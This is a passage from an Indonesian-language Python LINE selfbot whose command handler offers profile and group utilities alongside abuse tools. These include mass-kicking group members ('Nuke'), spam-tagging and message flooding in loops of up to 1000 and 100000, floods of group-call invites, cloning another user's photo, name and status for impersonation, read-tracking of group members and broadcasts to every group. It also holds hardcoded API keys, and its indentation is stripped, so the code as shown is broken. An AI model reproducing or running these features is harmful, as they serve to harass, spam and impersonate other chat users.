line.sendMessage(to," Protection Already Off ")
else:
line.sendMessage(to,"Protection Already Off ")
else:
settings["protect"] = False
if settings["lang"] == "JP":
line.sendMessage(to,"Protection Already Off ")
else:
line.sendMessage(to,"Protection Already Off ")
elif text.lower() == 'linkprotect on':
if sender in lineMID:
if settings["qrprotect"] == True:
if settings["lang"] == "JP":
line.sendMessage(to,"Linkprotect Already On ")
else:
line.sendMessage(to,"Linkprotect Already On ")
else:
settings["qrprotect"] = True
if settings["lang"] == "JP":
line.sendMessage(to,"Linkprotect Already On ")
else:
line.sendMessage(to,"Linkprotect Already On ")
elif text.lower() == 'linkprotect off':
if sender in lineMID:
if settings["qrprotect"] == False:
if settings["lang"] == "JP":
line.sendMessage(to,"Linkprotect Already Off ")
else:
line.sendMessage(to,"Linkprotect Already Off ")
else:
settings["qrprotect"] = False
if settings["lang"] == "JP":
line.sendMessage(to,"Linkprotect Already Off ")
else:
line.sendMessage(to,"Linkprotect Already Off ")
#==============================================================================#
elif text.lower() == 'aku' or text.lower() == 'me':
sendMessageWithMention(to, lineMID)
line.sendContact(to, lineMID)
me = line.getContact(lineMID)
line.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + me.pictureStatus)
elif text.lower() == 'mid':
line.sendMessage(msg.to,lineMID)
elif text.lower() == 'tagme':
sendMessageWithMention(to, lineMID)
#==============================================================================#
elif text.lower() == 'creator':
line.sendContact(to, "u9922f516e7fac1ea266f55a148e76217")
elif text.lower() == 'myname':
me = line.getContact(lineMID)
line.sendMessage(msg.to,"DisplayName:\n\n" + me.displayName)
elif text.lower() == "update pict":
settings["changePicture"] = True
line.sendMessage(to, "Send image")
elif text.lower() == "update pict group":
if msg.toType == 2:
if to not in settings["changeGroupPicture"]:
settings["changeGroupPicture"].append(to)
line.sendMessage(to, "Send image ")
elif text.lower() == 'mybio':
me = line.getContact(lineMID)
line.sendMessage(msg.to,"StatusMessage:\n\n" + me.statusMessage)
elif text.lower() == 'pp':
me = line.getContact(lineMID)
line.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + me.pictureStatus)
elif text.lower() == 'myvid':
me = line.getContact(lineMID)
line.sendVideoWithURL(msg.to,"http://dl.profile.line-cdn.net/" + me.pictureStatus + "/vp")
elif text.lower() == 'cover':
me = line.getContact(lineMID)
cover = line.getProfileCoverURL(lineMID)
line.sendImageWithURL(msg.to, cover)
#___________________UNSEND_______________
elif text.lower() == 'unsend:on':
if msg._from in lineMID:
wait["unsend"] = True
line.sendMessage(msg.to, "Unsend message enable")
elif text.lower() == 'unsend:off':
if msg._from in lineMID:
wait["unsend"] = False
line.sendMessage(msg.to, "Unsend message disable")
elif msg.text.lower().startswith("getcontact "):
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
contact = line.getContact(ls)
mi_d = contact.mid
line.sendContact(msg.to, mi_d)
elif msg.text.lower().startswith("mid "):
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
ret_ = ls
line.sendMessage(msg.to, str(ret_))
elif msg.text.lower().startswith("getname "):
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
contact = line.getContact(ls)
line.sendMessage(msg.to, "[ Display Name ]\n" + contact.displayName)
elif msg.text.lower().startswith("getbio "):
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
contact = line.getContact(ls)
line.sendMessage(msg.to, "[ Status Message ]\n{}" + contact.statusMessage)
elif msg.text.lower().startswith("pict "):
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
path = "http://dl.profile.line.naver.jp/" + line.getContact(ls).pictureStatus
line.sendImageWithURL(msg.to, str(path))
elif msg.text.lower().startswith("get videoprofile "):
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
path = "http://dl.profile.line.naver.jp/" + line.getContact(ls).pictureStatus + "/vp"
line.sendImageWithURL(msg.to, str(path))
#_______________VKICK______________________
elif "vkick" in text.lower():
if 'MENTION' in msg.contentMetadata.keys() != None:
names = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
try:
line.kickoutFromGroup(msg.to, [mention['M']])
line.inviteIntoGroup(msg.to,[mention['M']])
line.cancelGroupInvitation(msg.to,[mention['M']])
except:
line.sendMessage(to, "Error")
#_____________KICK____________________
elif "kick" in text.lower():
if 'MENTION' in msg.contentMetadata.keys() != None:
names = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
try:
line.kickoutFromGroup(msg.to, [mention['M']])
except:
line.kickoutFromGroup(msg.to, [mention['M']])
else:
pass
#_____________NUKE_________________
elif "Nuke" in msg.text:
if msg.toType == 2:
_name = msg.text.replace("Nuke","")
gs = line.getGroup(msg.to)
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
line.sendMessage(msg.to,"Not found.")
else:
for target in targets:
try:
line.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
pass
elif "Nk:" in msg.text:
if msg.toType == 2:
_name = msg.text.replace("Nk:","")
gs = line.getGroup(msg.to)
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
line.sendMessage(msg.to,"Not found.")
else:
for target in targets:
try:
line.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
pass
elif msg.text.lower().startswith("cover "):
if line != None:
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
path = line.getProfileCoverURL(ls)
line.sendImageWithURL(msg.to, str(path))
elif msg.text.lower().startswith("copy "):
if msg._from in lineMID:
#script clone profile Eg Scr
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
link = "http://dl.profile.line-cdn.net/" + line.getContact(ls).pictureStatus
path = line.downloadFileURL(str(link))
contact = line.getContact(ls)
line.updateProfilePicture(path)
nama = line.getProfile()
nama.displayName = contact.displayName
line.updateProfile(nama)
status = line.getProfile()
status.statusMessage = contact.statusMessage
line.updateProfile(status)
jp = line.getContact(sender).displayName
line.sendMessage(msg.to,"Berhasil Clone Profile "+jp)
elif text.lower() == 'backup':
try:
line.updateProfilePicture(mybackup.pictureStatus)
line.updateProfile(mybackup)
line.sendMessage(msg.to, "Backup profile succes...")
except Exception as e:
line.sendMessage(msg.to, str (e))
elif text.lower() == 'res':
try:
link = "http://dl.profile.line.naver.jp/" + contact.pictureStatus
path = line.downloadFileURL(str(link))
contact = line.getContact(lineMID)
line.updateProfilePicture(path)
nama = line.getProfile()
nama.displayName = str(myProfile["displayName"])
line.updateProfile(nama)
status = line.getProfile()
status.statusMessage = str(myProfile["statusMessage"])
line.updateProfile(status)
line.sendMessage(msg.to, "Done Backup Profile ")
except:
line.sendMessage(msg.to, "Invalid")
elif msg.text.lower().startswith("restore"):
if msg._from in lineMID:
try:
lineProfile.displayName = str(myProfile["displayName"])
lineProfile.statusMessage = str(myProfile["statusMessage"])
lineProfile.pictureStatus = str(myProfile["pictureStatus"])
line.updateProfileAttribute(8, lineProfile.pictureStatus)
line.updateProfile(lineProfile)
sendMention(msg.to, sender, "「 Restore Profile 」\nNama ", " \nBerhasil restore profile")
except:
line.sendMessage(msg.to, "Gagal restore profile")
elif text.lower() == 'pmpict':
contact = line.getContact(msg.to)
path =("http://dl.profile.line-cdn.net/" + contact.pictureStatus)
line.sendImageWithURL(msg.to, path)
elif text.lower() == 'pmcover':
contact = line.getContact(msg.to)
cu = line.getProfileCoverURL(msg.to)
#cu = channel.getProfileCoverURL(msg.to)
#h = client.getHome(msg.to)
path = str(cu)
line.sendImageWithURL(msg.to, path)
elif msg.text.lower().startswith("gcall "):
if msg.toType == 2:
sep = text.split(" ")
strnum = text.replace(sep[0] + " ","")
num = int(strnum)
line.sendMessage(to, "Mengundang %s call grup!" %str(num))
for var in range(0,num):
group = line.getGroup(to)
members = [contact.mid for contact in group.members]
line.acquireGroupCallRoute(to)
line.inviteIntoGroupCall(to, contactIds=members)
elif msg.text.lower().startswith("jumlahtag: "):
#if wait["selfbot"] == True:
if sender in lineMID:
proses = text.split(":")
strnum = text.replace(proses[0] + ":","")
num = int(strnum)
Setmain["RAlimit"] = num
line.sendMessage(msg.to,"♻Total Spamtag Diubah Menjadi " +strnum)
elif msg.text.lower().startswith("colek "):
#if wait["selfbot"] == True:
if sender in lineMID:
if 'MENTION' in msg.contentMetadata.keys()!=None:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
zx = ""
zxc = " "
zx2 = []
pesan2 = "@a"" "
xlen = str(len(zxc))
xlen2 = str(len(zxc)+len(pesan2)-1)
zx = {'S':xlen, 'E':xlen2, 'M':key1}
zx2.append(zx)
zxc += pesan2
msg.contentType = 0
msg.text = zxc
lol = {'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}
msg.contentMetadata = lol
jmlh = int(Setmain["RAlimit"])
if jmlh <= 1000:
for x in range(jmlh):
try:
line.sendMessage1(msg)
except Exception as e:
line.sendMessage(msg.to,str(e))
else:
line.sendMessage(msg.to,"Jumlah melebihi 1000")
elif "Spam " in msg.text:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+" ","")
tulisan = jmlh * (teks+"\n")
if txt[1] == "on":
if jmlh <= 100000:
for x in range(jmlh):
line.sendMessage(msg.to, teks)
else:
line.sendMessage(msg.to, "")
elif txt[1] == "off":
if jmlh <= 100000:
line.sendMessage(msg.to, tulisan)
else:
line.sendMessage(msg.to, "")
elif msg.text in ["."]:
line.sendMessage(msg.to,"Assalamu alaikum wr.wb...")
elif msg.text in [".."]:
line.sendMessage(msg.to,"Wa'alaikum salam wr.wb...")
#==============================================================================#
elif msg.text.lower().startswith("mimicadd "):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
settings["mimic"]["target"][target] = True
line.sendMessage(msg.to,"Target ditambahkan!")
break
except:
line.sendMessage(msg.to,"Added Target Fail !")
break
elif msg.text.lower().startswith("mimicdel "):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del settings["mimic"]["target"][target]
line.sendMessage(msg.to,"Target dihapuskan!")
break
except:
line.sendMessage(msg.to,"Deleted Target Fail !")
break
elif text.lower() == 'mimiclist':
if settings["mimic"]["target"] == {}:
line.sendMessage(msg.to,"Tidak Ada Target")
else:
mc = "╔══[ Mimic List ]"
for mi_d in settings["mimic"]["target"]:
mc += "\n╠ "+line.getContact(mi_d).displayName
line.sendMessage(msg.to,mc + "\n╚══[◑ The End ◑]")
elif "autoreject " in msg.text.lower():
xpesan = msg.text.lower()
xres = xpesan.replace("autoreject ","")
if xres == "off":
settings['autorejc'] = False
line.sendMessage(msg.to,"AutoReject already Off")
elif xres == "on":
settings['autorejc'] = True
line.sendMessage(msg.to,"AutoReject already On")
elif text.lower() == 'contact on':
if settings["contact"] == True:
if settings["lang"] == "JP":
line.sendMessage(to,"Contact turned On")
else:
line.sendMessage(to,"Contact turned On")
else:
settings["contact"] = True
if settings["lang"] == "JP":
line.sendMessage(to,"Contact turned On")
else:
line.sendMessage(to,"Contact turned On")
elif text.lower() == 'contact off':
if settings["contact"] == False:
if settings["lang"] == "JP":
line.sendMessage(to,"Contact turned Off")
else:
line.sendMessage(to,"Contact turned Off")
else:
settings["contact"] = False
if settings["lang"] == "JP":
line.sendMessage(to,"Contact turned Off")
else:
line.sendMessage(to,"Contact turned Off")
elif "mimic " in msg.text.lower():
sep = text.split(" ")
mic = text.replace(sep[0] + " ","")
if mic == "on":
if settings["mimic"]["status"] == False:
settings["mimic"]["status"] = True
line.sendMessage(msg.to,"Reply Message On")
elif mic == "off":
if settings["mimic"]["status"] == True:
settings["mimic"]["status"] = False
line.sendMessage(msg.to,"Reply Message Off")
elif msg.text.lower().startswith("sider on"):
try:
del cctv['point'][msg.to]
del cctv['sidermem'][msg.to]
del cctv['cyduk'][msg.to]
except:
pass
cctv['point'][msg.to] = msg.id
cctv['sidermem'][msg.to] = ""
cctv['cyduk'][msg.to]=True
line.sendMessage(msg.to,"Sider Dkz turned On")
elif msg.text.lower().startswith("sider off"):
if msg.to in cctv['point']:
cctv['cyduk'][msg.to]=False
line.sendMessage(msg.to, "ᴄᴄᴛv ʏᴀɴɢ ᴛᴇʀᴛᴀɴɢᴋᴀᴘ:\n"+cctv['sidermem'][msg.to])
line.sendMessage(to,"Sider Dkz turned Off")
else:
line.sendMessage(msg.to, "On aja belum ")
#==============================================================================#
elif text.lower() == 'welcome on':
if settings["welcomemsg"] == True:
if settings["lang"] == "JP":
line.sendMessage(to,"WelcomeMessage Turned On")
else:
settings["welcomemsg"] = True
if settings["lang"] == "JP":
line.sendMessage(to,"WelcomeMessage Turned On")
elif text.lower() == 'welcome off':
if settings["welcomemsg"] == False:
if settings["lang"] == "JP":
line.sendMessage(to,"WelcomeMessage Turned Off")
else:
settings["welcomemsg"] = False
if settings["lang"] == "JP":
line.sendMessage(to,"WelcomeMessage Turned Off")
#==============================================================================#
elif text.lower() == 'leavemsg on':
if settings["leavemsg"] == True:
if settings["lang"] == "JP":
line.sendMessage(to,"LeaveMessage Turned On")
else:
settings["leavemsg"] = True
if settings["lang"] == "JP":
line.sendMessage(to,"LeaveMessage Turned On")
elif text.lower() == 'leavemsg off':
if settings["leavemsg"] == False:
if settings["lang"] == "JP":
line.sendMessage(to,"LeaveMessage Turned Off")
else:
settings["leavemsg"] = False
if settings["lang"] == "JP":
line.sendMessage(to,"LeaveMessage Turned Off")
#--------------------------------------------------------
elif 'Set welcome ' in msg.text:
if msg._from in lineMID:
spl = msg.text.replace('Set welcome ','')
if spl in [""," ","\n",None]:
line.sendMessage(msg.to, "Gagal mengganti Welcome")
else:
settings["welcome"] = spl
line.sendMessage(msg.to, "WelcomeMessage diubah jadi :\n\n{}".format(str(spl)))
elif text.lower() == "cek welcome":
if msg._from in lineMID:
line.sendMessage(msg.to, "WelcomeMessage :\n\n" + str(settings["welcome"]))
#--------------------------------------------------------
elif 'Set leavemsg ' in msg.text:
if msg._from in lineMID:
spl = msg.text.replace('Set leavemsg ','')
if spl in [""," ","\n",None]:
line.sendMessage(msg.to, "Gagal mengganti LeaveMsg")
else:
settings["keluar"] = spl
line.sendMessage(msg.to, "LeaveMessage diubah jadi :\n\n{}".format(str(spl)))
elif text.lower() == "cek leavemsg":
if msg._from in lineMID:
line.sendMessage(msg.to, "LeaveMessage :\n\n" + str(settings["keluar"]))
#=============RESPON1=============================
elif 'Set respon1 ' in msg.text:
if sender in lineMID:
spl = msg.text.replace('Set respon1 ','')
if spl in [""," ","\n",None]:
line.sendMessage(msg.to, "Gagal mengganti Respon1")
else:
settings["tag"] = spl
line.sendMessage(msg.to, "Respon1 Text Diubah Menjadi :\n\n{}".format(str(spl)))
elif text.lower() == "cek respon1":
if sender in lineMID:
line.sendMessage(msg.to, "Respon1 Text Kamu :\n\n" + str(settings["tag"]))
#=============RESPON2=============================
elif 'Set respon2 ' in msg.text:
if sender in lineMID:
spl = msg.text.replace('Set respon2 ','')
if spl in [""," ","\n",None]:
line.sendMessage(msg.to, "Gagal mengganti Respon2")
else:
settings["tag2"] = spl
line.sendMessage(msg.to, "Respon2 Image Diubah Menjadi :\n\n{}".format(str(spl)))
elif text.lower() == "cek respon2":
if sender in lineMID:
line.sendMessage(msg.to, "Respon2 TagImage Kamu :\n\n" + str(settings["tag2"]))
#=============RESPON3============================
elif 'Set respon3 ' in msg.text:
if sender in lineMID:
spl = msg.text.replace('Set respon3 ','')
if spl in [""," ","\n",None]:
line.sendMessage(msg.to, "Gagal mengganti Respon3")
else:
settings["tag3"] = spl
line.sendMessage(msg.to, "Respon3 PM Diubah Menjadi :\n\n{}".format(str(spl)))
elif text.lower() == "cek respon3":
if sender in lineMID:
line.sendMessage(msg.to, "Respon3 PM Kamu :\n\n" + str(settings["tag3"]))
#=============RESPON3============================
elif 'Set autolike ' in msg.text:
if sender in lineMID:
spl = msg.text.replace('Set autolike ','')
if spl in [""," ","\n",None]:
line.sendMessage(msg.to, "Gagal mengganti autolike")
else:
wait["comment1"] = spl
line.sendMessage(msg.to, "Autocommand like diubah menjadi :\n\n{}".format(str(spl)))
#=============RESPON3============================
elif 'Set sidertext ' in msg.text:
if sender in lineMID:
spl = msg.text.replace('Set sidertext ','')
if spl in [""," ","\n",None]:
line.sendMessage(msg.to, "Gagal mengganti Sider")
else:
settings["mention"] = spl
line.sendMessage(msg.to, "Sider Diubah Menjadi :\n\n{}".format(str(spl)))
elif text.lower() == "cek sidertext":
if sender in lineMID:
line.sendMessage(msg.to, "Sider Kamu :\n\n" + str(settings["mention"]))
elif 'Set responpc ' in msg.text:
if sender in lineMID:
spl = msg.text.replace('Set responpc ','')
if spl in [""," ","\n",None]:
line.sendMessage(msg.to, "Gagal mengganti ResponPc")
else:
settings["responpc"] = spl
line.sendMessage(msg.to, "Respon Pc diganti jadi :\n\n".format(str(spl)))
elif text.lower() == "cek responpc":
if sender in lineMID:
line.sendMessage(msg.to, "Respon Pc mu :\n\n"+ str(settings["responpc"]))
elif text.lower() == "cek autolike":
if sender in lineMID:
line.sendMessage(msg.to, "AutoLike mu :\n\n"+ str(wait["comment1"]))
elif text.lower() == 'gcreator':
group = line.getGroup(to)
GS = group.creator.mid
line.sendContact(to, GS)
elif text.lower() == 'gid':
gid = line.getGroup(to)
line.sendMessage(to, "[ID Group : ]\n" + gid.id)
elif text.lower() == 'gpict':
group = line.getGroup(to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
line.sendImageWithURL(to, path)
elif text.lower() == 'gname':
gid = line.getGroup(to)
line.sendMessage(to, "[Nama Group : ]\n" + gid.name)
elif text.lower() == 'gurl':
if msg.toType == 2:
group = line.getGroup(to)
if group.preventedJoinByTicket == False:
ticket = line.reissueGroupTicket(to)
line.sendMessage(to, "[ Group Ticket ]\nhttps://line.me/R/ti/g/{}".format(str(ticket)))
else:
line.sendMessage(to, "Grup qr tidak terbuka silahkan buka terlebih dahulu dengan perintah {}openqr".format(str(settings["keyCommand"])))
elif text.lower() == 'link on':
if msg.toType == 2:
group = line.getGroup(to)
if group.preventedJoinByTicket == False:
line.sendMessage(to, "Grup qr sudah terbuka")
else:
group.preventedJoinByTicket = False
line.updateGroup(group)
line.sendMessage(to, "Berhasil membuka grup qr")
elif text.lower() == 'link off':
if msg.toType == 2:
group = line.getGroup(to)
if group.preventedJoinByTicket == True:
line.sendMessage(to, "Grup qr sudah tertutup")
else:
group.preventedJoinByTicket = True
line.updateGroup(group)
line.sendMessage(to, "Berhasil menutup grup qr")
elif text.lower() == 'reject':
gid = line.getGroupIdsInvited()
for i in gid:
line.rejectGroupInvitation(i)
if wait["lang"] == "JP":
line.sendMessage(msg.to,"Reject GroupInvited Done")
else:
line.sendMessage(msg.to,"Done")
elif text.lower() == 'cancel':
if msg._from in lineMID:
if msg.toType == 2:
group = line.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
line.cancelGroupInvitation(msg.to,[_mid])
line.sendMessage(msg.to,"I pretended to cancel and canceled.")
elif text.lower() == 'ginfo':
group = line.getGroup(to)
try:
gCreator = group.creator.displayName
except:
gCreator = "Tidak ditemukan"
if group.invitee is None:
gPending = "0"
else:
gPending = str(len(group.invitee))
if group.preventedJoinByTicket == True:
gQr = "Tertutup"
gTicket = "Tidak ada"
else:
gQr = "Terbuka"
gTicket = "https://line.me/R/ti/g/{}".format(str(line.reissueGroupTicket(group.id)))
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
ret_ = "╔══[ Group Info ]"
ret_ += "\n╠ Nama Group : {}".format(str(group.name))
ret_ += "\n╠ ID Group : {}".format(group.id)
ret_ += "\n╠ Pembuat : {}".format(str(gCreator))
ret_ += "\n╠ Jumlah Member : {}".format(str(len(group.members)))
ret_ += "\n╠ Jumlah Pending : {}".format(gPending)
ret_ += "\n╠ Group Qr : {}".format(gQr)
ret_ += "\n╠ Group Ticket : {}".format(gTicket)
ret_ += "\n╚══[ Finish ]"
line.sendMessage(to, str(ret_))
line.sendImageWithURL(to, path)
elif text.lower() == 'memlist':
if msg.toType == 2:
group = line.getGroup(to)
ret_ = "╔══[ Member List ]"
no = 0 + 1
for mem in group.members:
ret_ += "\n╠ {}. {}".format(str(no), str(mem.displayName))
no += 1
ret_ += "\n╚══[ Total {} ]".format(str(len(group.members)))
line.sendMessage(to, str(ret_))
elif text.lower() == 'groups':
groups = line.groups
ret_ = "╔══[ Group List ]"
no = 0 + 1
for gid in groups:
group = line.getGroup(gid)
ret_ += "\n╠ {}. {} | {}".format(str(no), str(group.name), str(len(group.members)))
no += 1
ret_ += "\n╚══[ Total {} Groups ]".format(str(len(groups)))
line.sendMessage(to, str(ret_))
elif msg.text in ["Autolike"]:
if sender in lineMID:
print ("[Command]Like executed")
line.sendMessage(msg.to,"Auto Like Is running")
try:
autolike()
except:
pass
elif "/ti/g/" in msg.text.lower():
if settings["autoJoinTicket"] == True:
link_re = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = link_re.findall(text)
n_links = []
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
group = line.findGroupByTicket(ticket_id)
line.acceptGroupInvitationByTicket(group.id,ticket_id)
line.sendMessage(to, "Berhasil masuk ke group %s" % str(group.name))
elif text.lower() == 'tagmem' or text.lower() == 'tag' or text.lower() == 'hi' or text.lower() == 'dkz' or text.lower() == 'cling' or text.lower() == 'hem' or text.lower() == 'absen' or text.lower() == 'muach' or text.lower() == 'hai' or text.lower() == "dor":
group = line.getGroup(msg.to)
members = [contact.mid for contact in group.members]
tags = []
for i in range(0, len(members), 20):
tags.append(list(members[i:i+20]))
for t in tags:
msg = ttypes.Message(to=to)
tst ="❨✪❩ ᴅᴋᴢ ᴍᴇɴᴛɪᴏɴs ❨✪❩ \n\n"
tst += u''
s=len(tst)
d=[]
for i in range(len(t)):
d.append({"S":str(s), "E" :str(s+4), "M":t[i]})
s += 5
tst +=u'@jek\n'
msg.text = tst.rstrip()
msg.contentMetadata = {u'MENTION':json.dumps({"MENTIONEES":d})}
line.talk.sendMessage(0,msg)
jp = line.getContact(lineMID).displayName
else:
line.sendMessage(to,"╭════════════════╮\n❨✪❩ ᴍᴇɴᴛɪᴏɴᴇs ʙʏ : " + jp+"\n╰════════════════╯")
#==============================================================================#
elif text.lower() == 'kalender':
tz = pytz.timezone("Asia/Makassar")
timeNow = datetime.now(tz=tz)
day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"]
hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"]
bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
hr = timeNow.strftime("%A")
bln = timeNow.strftime("%m")
for i in range(len(day)):
if hr == day[i]: hasil = hari[i]
for k in range(0, len(bulan)):
if bln == str(k): bln = bulan[k-1]
readTime = hasil + ", " + timeNow.strftime('%d') + " - " + bln + " - " + timeNow.strftime('%Y') + "\nJam : [ " + timeNow.strftime('%H:%M:%S') + " ]"
line.sendMessage(msg.to, readTime)
elif text.lower() == "remove chat":
if msg._from in lineMID:
try:
line.removeAllMessages(op.param2)
line.sendMessage(msg.to,"Chat dibersihkan...")
except:
pass
elif msg.text.startswith("Music "):
try:
query = msg.text.replace("Music ","")
query = urllib.parse.quote(query)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib.request.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
dl=("https://www.youtube.com" + results['href'])
vid = pafy.new(dl)
stream = vid.streams
for s in stream:
vin = s.url
hasil = 'Hasil Info Music:\n\n'
hasil += vid.title
hasil +='\n» Penulis : ' + str(vid.author)
hasil +='\n» Durasi : ' + str(vid.duration)
hasil +='\n» Suka : ' + str(vid.likes)
hasil +='\n» Penonton : ' + str(vid.viewcount)
hasil +='\n» Rating : ' +str(vid.rating)
hasil +='\n» Diterbitkan : ' + str(vid.published)
hasil +='\n» Channel : Jeckydkz.music.com'
line.sendMessage(msg.to,hasil)
line.sendAudioWithURL(msg.to,vin)
line.sendVideoWithURL(msg.to,vin)
print (" Yt-mp3 Succes open")
except:
line.sendMessage(msg.to, "Maaf Keyword anda salah")
elif "kalkulator" in msg.text.lower():
try:
sep = msg.text.split(" ")
cal = msg.text.replace(sep[0] + " ","")
result = requests.get("http://calcatraz.com/calculator/api?c="+urllib.parse.quote(cal))
data = result.text
line.sendMessage(to,"Hasil:\n\n"+ cal+ " = " +str(data))
except Exception as error:
logError(error)
line.sendMessage(to, str(error))
elif "instagram" in msg.text.lower():
sep = text.split(" ")
search = text.replace(sep[0] + " ","")
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
r = web.get("https://www.instagram.com/{}/?__a=1".format(search))
try:
data = json.loads(r.text)
ret_ = "╔══[ Profile Instagram ]"
ret_ += "\n╠ Nama : {}".format(str(data["user"]["full_name"]))
ret_ += "\n╠ Username : {}".format(str(data["user"]["username"]))
ret_ += "\n╠ Bio : {}".format(str(data["user"]["biography"]))
ret_ += "\n╠ Pengikut : {}".format(format_number(data["user"]["followed_by"]["count"]))
ret_ += "\n╠ Diikuti : {}".format(format_number(data["user"]["follows"]["count"]))
if data["user"]["is_verified"] == True:
ret_ += "\n╠ Verifikasi : Sudah"
else:
ret_ += "\n╠ Verifikasi : Belum"
if data["user"]["is_private"] == True:
ret_ += "\n╠ Akun Pribadi : Iya"
else:
ret_ += "\n╠ Akun Pribadi : Tidak"
ret_ += "\n╠ Total Post : {}".format(format_number(data["user"]["media"]["count"]))
ret_ += "\n╚══[ https://www.instagram.com/{} ]".format(search)
path = data["user"]["profile_pic_url_hd"]
line.sendImageWithURL(to, str(path))
line.sendMessage(to, str(ret_))
except:
line.sendMessage(to, "Pengguna tidak ditemukan")
elif msg.text.lower().startswith("movie"):
try:
sep = msg.text.split(" ")
search = msg.text.replace(sep[0] + " ","")
apiKey = "zbYyMGhWy06DDsSHeUAK3GHQkEbCL8"
api = requests.get("https://farzain.xyz/api/film.php?apikey={}&id={}".format(str(apiKey), str(search)))
data = api.text
data = json.loads(data)
if data["status"] == "success":
anu = "[ Result Film ]"
anu += "\nTitle : {}".format(str(data["Title"]))
anu += "\nYear : {}".format(str(data["Year"]))
anu += "\nRated : {}".format(str(data["Rated"]))
anu += "\nReleased : {}".format(str(data["Released"]))
anu += "\nDuration : {}".format(str(data["Runtime"]))
anu += "\nGenre : {}".format(str(data["Genre"]))
path = str(data["Poster"])
line.sendImageWithURL(msg.to, str(path))
line.sendMessage(msg.to, str(anu))
else:
sendMentionV2(msg.to, "Maaf @!,hasil pencarin tidak ditemukan", [sender])
except Exception as error:
line.sendMessage(msg.to, str(error))
#___________BROADCAST_______________
elif msg.text.lower().startswith("broadcast "):
sep = text.split(" ")
txt = text.replace(sep[0] + " ","")
groups = line.groups
for group in groups:
line.sendMessage(group, "Broadcast:\n\n{}".format(str(txt)))
elif text.startswith("Led "):
separate = text.split(" ")
teks = text.replace(separate[0] + " ","")
url = "https://ari-api.herokuapp.com/led?text="+teks+"&sign=PB"
line.sendImageWithURL(to, url)
elif text.startswith("Poster "):
separate = text.split(" ")
teks = text.replace(separate[0] + " ","")
url = "https://ari-api.herokuapp.com/neon?text="+teks+"&color=blue"
line.sendImageWithURL(to, url)
elif text.startswith("Fs "):
sep = text.split(" ")
txt = text.replace(sep[0] + " ","")
url = "https://rest.farzain.com/api/special/fansign/cosplay/cosplay.php?apikey=nda123&text={}".format(txt)
line.sendImageWithURL(to, url)
elif text.startswith("Coba "):
sep = text.split(" ")
